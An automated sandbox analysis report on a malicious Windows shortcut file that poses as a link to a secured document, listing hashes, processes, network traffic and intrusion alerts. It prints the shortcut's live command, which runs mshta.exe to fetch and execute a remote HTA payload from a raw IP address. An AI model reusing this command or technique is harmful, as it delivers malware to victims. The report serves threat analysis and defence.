| File name: | _5830c290b366e970c5ea25db9727a8b5df8d3cc62aa7e7756e9eb688d43d78e6.lnk |
| Full analysis: | https://app.any.run/tasks/48cee3f8-c657-4f63-9dbf-8c3a009aeb15 |
| Verdict: | Malicious activity |
| Analysis date: | February 14, 2026, 16:24:03 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-ms-shortcut |
| File info: | MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=70, Unicoded, HasExpIcon "%SystemRoot%\System32\SHELL32.dll", MachineID desktop-pmqujnk KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, Archive, ctime=Wed Nov 5 19:45:52 2025, atime=Fri Feb 13 22:18:29 2026, mtime=Wed Nov 5 19:45:52 2025, length=43520, window=normal, IDListSize 0x013b, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\mshta.exe" |
| MD5: | 5080E029C34D68E3C0F94F7A266B1621 |
| SHA1: | 06B68017D187E6769CA19BD9540086ABF0EC3FE1 |
| SHA256: | 5830C290B366E970C5EA25DB9727A8B5DF8D3CC62AA7E7756E9EB688D43D78E6 |
| SSDEEP: | 24:8NuvZsxVn6Hwj1rcmx8AKMN54+/eW+/fPO+/lz4I0FEQ3kmc:81jj1dd/5HOmlIbQt |
MALICIOUS
Suspicious script execution (LNK)
- mshta.exe (PID: 4136)
SUSPICIOUS
No suspicious indicators.INFO
Checks proxy server information
- mshta.exe (PID: 4136)
- slui.exe (PID: 8252)
Reads Internet Explorer settings
- mshta.exe (PID: 4136)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .lnk | | | Windows Shortcut (100) |
|---|
EXIF
LNK
| Flags: | IDList, LinkInfo, Description, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode, ExpIcon |
|---|---|
| FileAttributes: | Archive |
| CreateDate: | 2025:11:05 19:45:52+00:00 |
| AccessDate: | 2026:02:13 22:18:29+00:00 |
| ModifyDate: | 2025:11:05 19:45:52+00:00 |
| TargetFileSize: | 43520 |
| IconIndex: | 70 |
| RunWindow: | Normal |
| HotKey: | (none) |
| TargetFileDOSName: | mshta.exe |
| DriveType: | Fixed Disk |
| DriveSerialNumber: | 7C83-E6CD |
| VolumeLabel: | - |
| LocalBasePath: | C:\Windows\System32\mshta.exe |
| Description: | Shortcut pointing to a secured document |
| RelativePath: | ..\..\..\..\Windows\System32\mshta.exe |
| WorkingDirectory: | C:\Windows\System32\ |
| CommandLineArguments: | http://159.255.38.19/.tzfuckua/tz.hta |
| IconFileName: | C:\Windows\System32\SHELL32.dll |
| MachineID: | desktop-pmqujnk |
Total processes
141
Monitored processes
2
Malicious processes
1
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 4136 | "C:\Windows\System32\mshta.exe" http://159.255.38.19/.tzfuckua/tz.hta | C:\Windows\System32\mshta.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Version: 11.00.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 8252 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
4 021
Read events
4 018
Write events
3
Delete events
0
Modification events
| (PID) Process: | (4136) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (4136) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (4136) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
Executable files
0
Suspicious files
0
Text files
0
Unknown types
0
Dropped files
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
26
TCP/UDP connections
37
DNS requests
11
Threats
3
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4948 | svchost.exe | GET | 200 | 2.16.164.120:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | NL | binary | 825 b | whitelisted |
7228 | RUXIMICS.exe | GET | 200 | 2.16.164.120:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | NL | binary | 825 b | whitelisted |
4136 | mshta.exe | GET | 404 | 159.255.38.19:80 | http://159.255.38.19/.tzfuckua/tz.hta | GB | html | 275 b | malicious |
— | — | GET | 200 | 2.16.204.156:443 | https://th.bing.com/th?id=OVP.qpQi42DwrDKZD6pmS2sIOgHgFo&w=180&h=102&c=1&rs=1&p=0 | unknown | text | 7.04 Kb | unknown |
— | — | GET | 200 | 2.16.204.156:443 | https://th.bing.com/th?id=ODSWG.3e9abe85-3ae5-4783-92df-366644aa6167&w=420&h=236&c=13&rs=1&p=0 | unknown | binary | 20.0 Kb | unknown |
— | — | GET | 200 | 2.16.204.156:443 | https://th.bing.com/th?id=OSK.d9d02de7c418534587e5be687df727a5&w=140&h=96&c=1&rs=1&p=0 | unknown | binary | 5.15 Kb | unknown |
— | — | GET | 200 | 2.16.204.145:443 | https://th.bing.com/th?id=OVP.wxchE9EsQixJDCn6v-y23QHgFo&w=188&h=110&c=1&rs=1&p=0 | unknown | binary | 7.24 Kb | unknown |
— | — | GET | 200 | 2.16.204.155:443 | https://th.bing.com/th?id=OVP.qpQi42DwrDKZD6pmS2sIOgHgFo&w=188&h=110&c=1&rs=1&p=0 | unknown | text | 7.55 Kb | unknown |
— | — | GET | 200 | 2.16.204.141:443 | https://th.bing.com/th?id=OVP.SRF1LOxQm2ly7M_1U7tFTAHgFo&w=188&h=110&c=1&rs=1&p=0 | unknown | binary | 6.98 Kb | unknown |
5568 | SearchApp.exe | GET | 200 | 2.16.204.153:443 | https://th.bing.com/th?id=ODSWG.3e9abe85-3ae5-4783-92df-366644aa6167&w=420&h=236&c=13&rs=1&p=0 | NL | binary | 20.0 Kb | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4948 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
4 | System | 192.168.100.255:137 | — | Not routed | — | whitelisted |
7228 | RUXIMICS.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
6768 | MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
— | — | 2.16.204.138:443 | www.bing.com | AKAMAI-ASN1 | NL | whitelisted |
— | — | 2.16.204.157:443 | www.bing.com | AKAMAI-ASN1 | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | Not routed | — | whitelisted |
6768 | MoUsoCoreWorker.exe | 2.16.164.120:80 | crl.microsoft.com | AKAMAI-ASN1 | NL | whitelisted |
4948 | svchost.exe | 2.16.164.120:80 | crl.microsoft.com | AKAMAI-ASN1 | NL | whitelisted |
7228 | RUXIMICS.exe | 2.16.164.120:80 | crl.microsoft.com | AKAMAI-ASN1 | NL | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
th.bing.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
4136 | mshta.exe | Potentially Bad Traffic | ET INFO Possible HTA Application Download |
4136 | mshta.exe | Misc activity | ET INFO Observed UA-CPU Header |
4136 | mshta.exe | Attempted User Privilege Gain | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl |